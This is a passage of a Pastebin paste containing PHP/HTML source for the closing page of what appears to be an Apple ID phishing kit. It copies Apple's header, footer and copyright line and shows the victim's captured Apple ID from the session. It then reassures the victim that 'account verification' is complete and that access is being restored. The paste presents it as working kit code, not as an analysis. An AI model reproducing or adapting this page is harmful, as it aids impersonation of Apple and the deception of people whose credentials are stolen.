  499. </label>
  500. </li>
  501. <li class="HeaderObj">
  502. <a class="Item1" href="#" style="display: inline-block;margin-left:50%;margin-top:11px" id="ac-gn-firstfocus-small"> <span class="ac-gn-link-text">&nbsp;</span> </a>
  503. <a class="Item10" style="display: inline-block;float:right;margin-top:11px" href="#"> <span class="ac-gn-link-text">&nbsp;</span> <span class="ac-gn-bag-badge"></span> </a> <span class="ac-gn-bagview-caret ac-gn-bagview-caret-large"></span>
  504. </li>
  505. </ul>
  506. <ul class="HeaderObjList">
  507. <li class="HeaderObj HeaderItem"><a class="HeaderLink Item1" href="#"></a></li>
  508. <li class="HeaderObj HeaderItem"><a class="HeaderLink Item2" href="#"></a></li>
  509. <li class="HeaderObj HeaderItem"><a class="HeaderLink Item3" href="#"></a></li>
  510. <li class="HeaderObj HeaderItem"><a class="HeaderLink Item4" href="#"></a></li>
  511. <li class="HeaderObj HeaderItem"><a class="HeaderLink Item5" href="#"></a></li>
  512. <li class="HeaderObj HeaderItem"><a class="HeaderLink Item6" href="#"></a></li>
  513. <li class="HeaderObj HeaderItem"><a class="HeaderLink Item7" href="#"></a></li>
  514. <li class="HeaderObj HeaderItem"><a class="HeaderLink Item8" href="#"></a></li>
  515. <li class="HeaderObj HeaderItem"><a class="HeaderLink Item9" href="#"></a></li>
  516. <li class="HeaderObj HeaderItem"><a class="HeaderLink Item10" href="#"></a></li>
  517. </ul>
  518. </div>
  519. </nav>
  520.  
  521.  
  522.  
  523. <div id="flow">
  524. <div class="flow-body signin clearfix" role="main">
  525. <div class="persona-splash no-photo clearfix">
  526.     <div class="persona-bg"></div>
  527.     <div class="container">
  528.         <div class="splash-section">
  529.             <div class=" person-wrapper">
  530.                 <div>
  531.                     <div class="row">
  532.                         <div class="col-sm-9 appleid-col">
  533.                             <div class="flex-container">
  534.                                 <h1 class="mobile appleid-user">
  535.                                     <span class="first_name">Account Verification</span>
  536.                                     <small class="SessionUser">Your Apple ID is <strong><?php echo $_SESSION['user'];?></strong> </small>
  537.                                 </h1>
  538.                             </div>
  539.                         </div>
  540.                         <div class="not-mobile col-sm-3">
  541.                             <div class="flex-container-signout">
  542.                                 <div class="signout pull-right">
  543.                                     <button class="btn btn-link">Sign Out </button>
  544.                                 </div>
  545.                             </div>
  546.                         </div>
  547.                     </div>
  548.                 </div>
  549.             </div>
  550.         </div>
  551.     </div>
  552. </div>
  553. <div class="container">
  554. <div class="flex home-content">
  555. <div class="container flow-sections">
  556. <div class="account-wrapper">
  557.   <div align="center">
  558.   <h1 style="color:#009CDE">Account Verification Complete</h1>
  559.     <p><span class="clearfix" style="margin-top: 10px;"><img src="assets/img/spin.GIF" height="42" width="42"></span></p>
  560.     <p>Please wait while we restore your account access...</p>
  561.     <p style="text-decoration: underline;color:red;">For your security you will automatically be logged out. </p>
  562.   </div>
  563. </div>
  564.  
  565.  
  566.  
  567. </div>
  568. </div>
  569. </div>
  570. </div>
  571. <footer>
  572. <div class="container">
  573. <div class="footer">
  574. <div class="footer-wrap">
  575. <div class="FooterLine1">
  576. <div class="line-level">Shop the <a href="#">Apple Online Store</a> (<?php echo $lang['APPCALL'];?>), visit an <a href="#">Apple Retail Store</a>, or find a <a href="#">reseller</a>.</div>
  577. </div>
  578. <div class="FooterLine2">
  579. <ul class="menu">
  580. <li class="item"><a href="#">Apple Info</a></li>
  581. <li class="item"><a href="#">Site Map</a></li>
  582. <li class="item"><a href="#">Hot News</a></li>
  583. <li class="item"><a href="#">RSS Feeds</a></li>
  584. <li class="item"><a href="#">Contact Us</a></li>
  585. <li class="item"><a class="choose" href="#"><img height="22" src="<?php echo $lang['FLAG'];?>" width="22"></a></li>
  586. </ul>
  587. </div>
  588. <div class="FooterLine3">Copyright © 2018 Apple Inc. All rights reserved.
  589. <ul class="menu">
  590. <li class="item"><a href="#">Terms of Use</a></li>
  591. <li class="item"><a href="#">Privacy Policy</a></li>
  592. </ul>
  593. </div>
  594. </div>
  595. </div>
  596. </div>
  597. </footer>
  598. </div>
  599. </div>
  600. </body>
  601. </html>
  602.  
  603. <?php } ?>
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!
 
Top